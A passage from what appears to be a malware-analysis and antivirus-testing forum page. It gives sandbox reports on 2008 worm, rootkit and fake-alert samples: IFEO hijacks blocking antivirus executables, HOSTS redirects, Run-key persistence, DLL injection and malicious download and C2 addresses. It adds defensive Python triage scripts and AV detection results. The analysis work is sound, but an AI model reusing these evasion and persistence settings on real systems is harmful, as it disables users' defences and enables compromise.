* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ice.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMOON.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iom.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JED.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kabackreport.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kasmain.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kav32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPPMain.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRF.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVPreScan.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwatch.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamapp.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcafee.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoft.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moniker.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ms.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32ACAN.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navrunr.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe]
  o Debugger = "svchost.exe"
Notes:
HOSTS file modified:
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
Connection established: l11.6600.org
Web page downloaded:
http://www.web179.cn/ad/count.asp?mac=00-00-00-00-00-00&os=WinXP&ver=2.5.1202&temp=242656&key=261380
Uses the classic IFEO technique to block antivirus software from running, and hides the traces of the sample's execution through DLL injection.
It also loads several drivers; this is a rootkit-class KillAV.
Analysis report for WinDefender2009.exe
General information:
Analysis date: 2008-12-10
Executable: Yes
File type: EXE
Uploader: kitman231
Analyser: integear
Sample tree:
WinDefender2009.exe
└ k.txt
└ qmgr0.dat
└ qmgr1.dat
└ WinDefender 2009.lnk
└ WinDefender 2009.lnk
└ uninstall.exe
└ vb.ini
└ windef.exe
└ WinDefender.s1
└ WinDefender.s2
└ WinDefender.s3
└ winnt.bmp
Behaviour analysis of WinDefender2009.exe:
Files created:
WinDefender2009.exe // parent
C:\Windows\k.txt
C:\Documents and Settings\All Users\Application Data\qmgr0.dat
C:\Documents and Settings\All Users\Application Data\qmgr1.dat
C:\Documents and Settings\[UserName]\Desktop\WinDefender 2009.lnk // shortcut, harmless
C:\Documents and Settings\[UserName]\Start Menu\Programs\WinDefender 2009.lnk // shortcut, harmless
C:\Program Files\uninstall.exe
C:\Program Files\vb.ini
C:\Program Files\windef.exe // main dropped file
C:\Program Files\WinDefender.s1
C:\Program Files\WinDefender.s2
C:\Program Files\WinDefender.s3
C:\Program Files\winnt.bmp
New processes created:
WinDefender2009.exe // parent
windef.exe // main dropped file
New services created:
BITS (state: running)
New registry entries created:
[HKEY_CURRENT_USER\Software\WinDefender2009]
* Path = "%ProgramFiles%\WinDefender"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeManager]
* SystemID = 0x00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
* WinDefender2009 = "%ProgramFiles%\WinDefender\windef.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WinDefender 2009]
* UninstallString = "%ProgramFiles%\WinDefender\Uninstall.exe"
* InstallLocation = "%ProgramFiles%\WinDefender"
* DisplayName = "WinDefender 2009"
* DisplayIcon = "%ProgramFiles%\WinDefender\windef.exe,0"
* DisplayVersion = "3.4"
* VersionMajor = 0x00000002
* VersionMinor = 0x00000002
* NoModify = 0x00000001
* NoRepair = 0x00000001
Files downloaded:
http://09021030408721.cn/cfg1.php
Analysis result:
Threat type: Trojan-FakeAlert
Sample file name: Trojan2008.12.24@009
Sample name: Cu.exe
Type: Worm-Autorun
Sample file name: Worm2008.12.24@001
Uploader: mizuhara
Analyser: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: Yes
Files created:
c:\autorun.inf
%Temp%\tmp3.tmp
%Temp%\tmp5.tmp
%Temp%\WER4848.dir00\appcompat.txt
%Temp%\WER4848.dir00\manifest.txt
%Temp%\WER4848.dir00\spoolsv.exe.hdmp
%Temp%\WER4848.dir00\spoolsv.exe.mdmp
%Programs%\homeview\Uninstall.lnk
%ProgramFiles%\homeview\Uninstall.exe
c:\resycled\boot.com
%Windir%\Temp\tmp6.tmp
Process and memory behaviour:
Files executed: %Temp%\jah32223.exe
                c:\resycled\boot.com
Remote DLL injection: %System%\dll.dll -> %System%\spoolsv.exe
Registry keys created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\homeview
o HKEY_CURRENT_USER\Software\homeview
o HKEY_CURRENT_USER\Software\{NSINAME}
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*]
  + DocumentInfo = 0x00000047
  + GlobalTip = 0x00000CD1
  + AutoTip = "rfx???|?{`"
  + Reserved = 0x6B02F719
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID]
  + (Default) = "{6BF52A52-394A-11D3-B153-00C04F79FAA6}"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\homeview]
  + UninstallString = ""%ProgramFiles%\homeview\Uninstall.exe""
  + InstallLocation = "%ProgramFiles%\homeview"
  + DisplayName = "homeview"
  + DisplayIcon = "%ProgramFiles%\homeview\Uninstall.exe,0"
o [HKEY_CURRENT_USER\Software\homeview]
  + (Default) = "%ProgramFiles%\homeview"
o [HKEY_CURRENT_USER\Software\{NSINAME}]
  + Start Menu Folder = "homeview"
Registry values modified:
* [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
  o (Default) = 0x0000000C
* [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent]
  o (Default) = 0x0000000C
Notes:
Connection established: 94.247.2.107:80 (may provide a backdoor)
回到第一頁
Sample name: k08aww.exe
Type: Worm-Autorun
Lab file name: Worm2008.12.24@003
Uploaded by: mizuhara
Analyst: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: yes
Files created:
c:\autorun.inf
%Temp%\9f.dll
c:\k08aww.bat
%System%\kavo.exe
%System%\kavo0.dll
%System%\kavo1.dll
Process and memory behaviour:
Files executed: %System%\kavo.exe
k08aww.exe
Remote memory allocation: in %Windir%\explorer.exe
Remote DLL injection: %System%\kavo0.dll -> %Windir%\explorer.exe
Registry values created:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
* kava = "%System%\kavo.exe"
Registry values modified:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
* CheckedValue = 0x00000000
Notes:
File downloaded: http://www.1a123.com/jj/cc.rar -> %Temp%\cc.rar
Standard Kxvo behaviour. With CheckedValue set to 0, selecting "Show hidden files and folders" in Folder Options no longer takes effect, so the dropped files and autorun.inf stay invisible in Explorer; this is the usual reason this family touches the SHOWALL key. The Run entry restarts kavo.exe at every logon, and kavo0.dll is injected into explorer.exe so the payload runs inside a process the user would not suspect.

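Both Worm-Autorun samples above drop c:\autorun.inf in the drive root so that Windows XP AutoRun launches the dropped file (k08aww.bat, c:\resycled\boot.com) when the drive is opened. The following is an added example written for this page, not code from the ACVL lab or from ThreatExpert: it parses an autorun.inf and lists every entry that can start a program (open=, shellexecute= and shell\<verb>\command=). SAMPLE_AUTORUN is a constructed file modelled on the names in the k08aww report, not the worm's real file, and BENIGN_AUTORUN is a constructed driver-CD style file for comparison.

```python
"""Added example: autorun.inf triage (illustrative code, not from the ACVL report)."""
import configparser
import os
import re

# Keys that make AutoRun execute a program; shell\<verb>\command is matched by regex.
LAUNCH_KEYS = {"open", "shellexecute"}
LAUNCH_VERB = re.compile(r"^shell\\[^\\]+\\command$")
EXEC_EXT = {".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".vbs", ".js"}

# Constructed sample, modelled on the k08aww report (not the real dropped file).
SAMPLE_AUTORUN = r"""[AutoRun]
open=k08aww.bat
shell\open\Command=k08aww.bat
shell\explore\Command=k08aww.bat
shellexecute=k08aww.bat
icon=%SystemRoot%\system32\SHELL32.dll,4
"""

# Constructed benign file: sets an icon and a label, launches nothing.
BENIGN_AUTORUN = r"""[autorun]
icon=setup.exe,0
label=Driver CD
"""


def parse_autorun(text: str) -> dict:
    """Return the [autorun] entries as {lower_key: value}; {} if there is no such section.

    Junk before the first section header (common in worm-written files) is skipped
    instead of raising MissingSectionHeaderError.
    """
    lines = text.splitlines()
    start = next((i for i, l in enumerate(lines) if l.lstrip().startswith("[")), None)
    if start is None:
        return {}
    cp = configparser.RawConfigParser(delimiters=("=",), allow_no_value=True, strict=False)
    cp.read_string("\n".join(lines[start:]))
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k.lower(): (v or "").strip() for k, v in cp.items(section)}
    return {}


def launch_entries(entries: dict) -> list:
    """Every (key, target) pair through which AutoRun would execute something."""
    return [(k, v) for k, v in entries.items() if k in LAUNCH_KEYS or LAUNCH_VERB.match(k)]


def _first_token(command: str) -> str:
    parts = command.split()
    return parts[0] if parts else ""


def triage(text: str) -> dict:
    """Summarise whether this autorun.inf launches code and what it points at."""
    entries = parse_autorun(text)
    hits = launch_entries(entries)
    targets = sorted({v for _, v in hits})
    exec_targets = [
        t for t in targets if os.path.splitext(_first_token(t))[1].lower() in EXEC_EXT
    ]
    return {
        "launches_code": bool(hits),
        "launch_entries": hits,
        "targets": targets,
        "executable_targets": exec_targets,
    }


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, triage(text))
```

On a real incident the file is read from the drive root (decode it as latin-1 rather than UTF-8, since worm-written files are often not valid UTF-8) and every target in executable_targets is hashed and submitted alongside the sample; the four entries in the constructed file cover the double-click, right-click Open, right-click Explore and AutoPlay paths, which is why worms set all of them.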
Sample name: Setup_trnovirfrech_c.exe
Type: Virus-All
Lab file name: Virus2008.12.24@001
Uploaded by: kitman231
Analyst: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: yes
Files created:
%Temp%\.tt1.tmp
%Temp%\.tt6B.tmp
%Temp%\.tt1.tmp.vbs
%System%\blphc35dj0erc1.scr
%System%\lphc35dj0erc1.exe
%System%\phc35dj0erc1.bmp
%System%\Restore\MachineGuid.txt
Process and memory behaviour:
Files executed: %System%\lphc35dj0erc1.exe
blphc35dj0erc1.scr
Remote memory allocation: in %System%\svchost.exe
Service modified: System Restore Service -> %System%\svchost.exe -k netsvcs, status: Running
Registry keys and values created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
* lphc35dj0erc1 = "%System%\lphc35dj0erc1.exe" (so that lphc35dj0erc1.exe runs every time Windows starts)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier]
* InstallID = "a4d60ab5-6f2e-4270-8461-df8594e006ee"
[HKEY_CURRENT_USER\Control Panel\Desktop]
* ConvertedWallpaper = "%System%\phc35dj0erc1.bmp"
* SCRNSAVE.EXE = "%System%\blphc35dj0erc1.scr"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
* NoDispBackgroundPage = 0x00000001
* NoDispScrSavPage = 0x00000001
[HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver]
* EulaAccepted = 0x00000001
Registry values modified:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
* DisableSR = 0x00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
* AppData = "%Profiles%\NetworkService\Application Data"
* Cache = "%Profiles%\NetworkService\Local Settings\Temporary Internet Files"
[HKEY_CURRENT_USER\Control Panel\Colors]
* Background = "0 0 255"
[HKEY_CURRENT_USER\Control Panel\Desktop]
* ScreenSaveActive = "1"
* Wallpaper = "%System%\phc35dj0erc1.bmp"
* WallpaperStyle = "0"
* OriginalWallpaper = "%System%\phc35dj0erc1.bmp"
Notes:
URLs fetched: http://windowsupdate.microsoft.com
localhost
http://avxp-2008.net/images/1224467073/9d1f0e1489a543dec127d3af79e71e0f/a4d60ab5-6f2e-4270-8461-df8594e006ee.gif
Suspected composite threat: it installs a backdoor and deliberately sabotages the display, installing a screensaver that makes the user believe the system is blue-screening (a simulated BSOD).
The registry key it creates identifies that screensaver as the Sysinternals BlueScreen Screen Saver, a legitimate utility whose EULA prompt the sample suppresses by writing EulaAccepted = 1. The NoDispBackgroundPage and NoDispScrSavPage policies hide the Background and Screen Saver tabs of Display Properties, so the user cannot undo the blue wallpaper or the screensaver through the UI. The InstallID GUID written under Software Notifier is the same GUID that appears in the avxp-2008.net URL, so that .gif request is a per-installation check-in.

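The three analyses above, and the Trojan-FakeAlert report before them, all come down to a handful of registry settings: Run entries, the SHOWALL CheckedValue trick, the Display Properties policies, a hijacked screensaver and System Restore. The following is an added example written for this page, not code from the ACVL lab or from ThreatExpert: it parses a .reg export (the text format regedit writes, version 5.00) and reports those settings. SAMPLE_REG is a constructed export whose values are modelled on the reports; it is not an export taken from an infected machine, and DisableSR is set to 1 here, unlike the report, so that check fires. A real export is UTF-16LE text, so decode it before calling parse_reg().

```python
"""Added example: triage a .reg export for the persistence and defence-evasion
settings reported above (illustrative code, not from the ACVL report)."""
import re

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
DEFAULT_RE = re.compile(r"^@=(?P<data>.*)$")

# Constructed export modelled on the WinDefender2009, kavo and lphc35dj0erc1 reports.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"WinDefender2009"="C:\\Program Files\\WinDefender\\windef.exe"
"kava"="C:\\WINDOWS\\system32\\kavo.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoDispBackgroundPage"=dword:00000001
"NoDispScrSavPage"=dword:00000001

[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\WINDOWS\\system32\\blphc35dj0erc1.scr"
"ScreenSaveActive"="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR"=dword:00000001
"""


def decode_data(data: str):
    """dword:xxxxxxxx -> int, "quoted string" -> unescaped str, anything else left raw."""
    if data.lower().startswith("dword:"):
        return int(data[6:], 16)
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: data}} for a version 5.00 .reg export."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            reg.setdefault(key, {})
            continue
        m = VALUE_RE.match(line) or DEFAULT_RE.match(line)
        if key is None or not m:
            continue  # hex continuation lines and anything unparsed are skipped
        name = m.groupdict().get("name") or "(Default)"
        reg[key][name] = decode_data(m.group("data"))
    return reg


def findings(reg: dict) -> list:
    """(category, detail) pairs for the settings the reports above flag."""
    out = []
    for key, values in reg.items():
        k = key.lower()
        v = {n.lower(): d for n, d in values.items()}  # value names are case-insensitive
        if k.endswith(("\\currentversion\\run", "\\currentversion\\runonce")):
            for name, data in values.items():
                out.append(("autostart", f"{name} -> {data}"))
        elif k.endswith("\\explorer\\advanced\\folder\\hidden\\showall"):
            if v.get("checkedvalue") == 0:  # "Show hidden files" no longer takes effect
                out.append(("hidden-files-locked", key))
        elif k.endswith("\\policies\\system"):
            for name in ("nodispbackgroundpage", "nodispscrsavpage"):
                if v.get(name) == 1:  # Display Properties tab hidden from the user
                    out.append(("display-tab-hidden", name))
        elif k.endswith("\\control panel\\desktop"):
            if v.get("screensaveactive") == "1" and v.get("scrnsave.exe"):
                out.append(("screensaver", v["scrnsave.exe"]))
        elif k.endswith("\\currentversion\\systemrestore"):
            if v.get("disablesr") == 1:
                out.append(("system-restore-disabled", key))
    return out


if __name__ == "__main__":
    for category, detail in findings(parse_reg(SAMPLE_REG)):
        print(f"{category:24} {detail}")
```

The screensaver finding is informational on its own, since legitimate .scr files also live in system32; it becomes significant together with display-tab-hidden, which is exactly the combination the lphc35dj0erc1 report shows. Paths here are the expanded form regedit exports; the sandbox reports use placeholders such as %System%, so match on the file name rather than the directory when comparing the two.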
A-Squared Anti-Malware 4.0
AV version: 4.0.0.67
Signature database: 2,477,867
Heuristics: off
Test environment: Windows XP SP3
Other: manual scan; detections deleted manually
Count shown by the AV: 19/19
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files:
none
Detected but not removed files:
none
Detected but quarantine only:
none
Tester: JusticeH

Avira AntiVir Personal
Version: 8.2.0.337
Engine: 8.02.00.45
Signatures: 7.01.01.37
Heuristics: fully disabled
Test environment: Windows Vista Home Premium SP1 x86
Other: manual scan with automatic action; repair on detection, delete if repair fails
Count shown by the AV: 20/25
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files (objects inside the archive):
none
Detected but not removed:
none
Detected and quarantined:
none
Tester: megakotaro

Filseclab (費爾托斯特) V7R3
Version: 7.3.1.23211
Engine: 8.02.00.45
Signatures: 9.20.32419
Heuristics: default (general mode)
Test environment: Windows XP SP3 x86
Other: manual scan + manual deletion
Count shown by the AV: 8/19
Actual number of files: 19
Files removed: 8
Files remaining: 11
Not detected: 11
Detection rate: 8/19 = 42.1%
Removal rate: 8/19 = 42.1%
Remaining files (objects inside the archive):
(in this and the later lists, the sample names survive only as "[email protected]", the form the source page's address obfuscation left them in; the original identifiers are not recoverable)
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed:
none
Detected and quarantined:
none
Tester: KINGYEH

SearchGUI
AV version: 20080825
Signature date: none
Heuristics: default
Test environment: Windows XP SP3 x86
Other: manual scan set to take no action
Count shown by the AV: 17/19
Actual number of files: 19
Files removed: 0
Files remaining: 2
Not detected: 2
Detected but not removed: 17
Detection rate: 17/19 = 89.5%
Removal rate: 0/19 = 0.0%
Remaining files:
[email protected]
[email protected]
Detected but not removed files:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Detected but quarantine only:
none
Tester: asusp4b533

Kaspersky Internet Security
AV version: 8.0.0.506
Signature date: 2008/12/25
Heuristics: high
Test environment: Windows Vista Ultimate SP1 x86
Other: none
Count shown by the AV: 19/58
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files:
none
Detected but not removed files:
none
Detected but quarantine only:
none
Tester: Bug

Dr.Web anti-virus
AV version: 4.44.5
Signature date: 2008/12/25
Heuristics: default
Test environment: Windows XP SP2 x86
Other: manual scan set to delete on detection
Count shown by the AV: 13/44
Actual number of files: 19
Files removed: 13
Files remaining: 6
Not detected: 6
Detected but not removed: 0
Detection rate: 13/19 = 68.4%
Removal rate: 13/19 = 68.4%
Remaining files:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed files:
none
Detected but quarantine only:
none
Tester: haol

Symantec Endpoint Security
AV version: 11.0.3001.2224
Signature date: 2008/12/25 r24
Heuristics: high
Test environment: Windows XP SP3 x86 (Virtual PC)
Other: none
Count shown by the AV: 15/38
Actual number of files: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed: 0
Detection rate: 15/19 = 78.9%
Removal rate: 15/19 = 78.9%
Remaining files:
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed files:
none
Detected but quarantine only:
none
Tester: imdino

McAfee VirusScan Plus
AV version: 5300.2777
Signature date: 2008/12/25 (DAT 5475)
Test environment: Windows XP SP3 x86
Other: manual scan set to delete on detection
Count shown by the AV: 15/19
Actual number of files: 19
Files removed: 6
Files remaining: 13
Not detected: 4
Detected but not removed: 9
Detection rate: 15/19 = 78.9%
Removal rate: 6/19 = 31.6%
Remaining files:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed files:
omitted
Detected but quarantine only:
omitted
Tester: integear

Trend Micro OfficeScan
AV version: 8.0
Signature date: 2008/12/25 (pattern 5.731.00)
Heuristics: off
Count shown by the AV: 19
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files:
none
Detected but not removed files:
none
Tester: kennyg

Trend Micro Internet Security
AV version: 17.0.1438
Signature date: 2008/12/25 (pattern 5.732.60)
Heuristics: off
Count shown by the AV: 19
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files:
none
Detected but not removed files:
none
Tester: kennyg

Kaspersky Anti-Virus
AV version: 7.0.1.325
Signature date: 2008/12/27
Heuristics: default
Test environment: Windows Vista Basic SP1 x86
Other: all threat categories selected
Count shown by the AV: 19/79
Actual number of files: 19
Files removed: 13
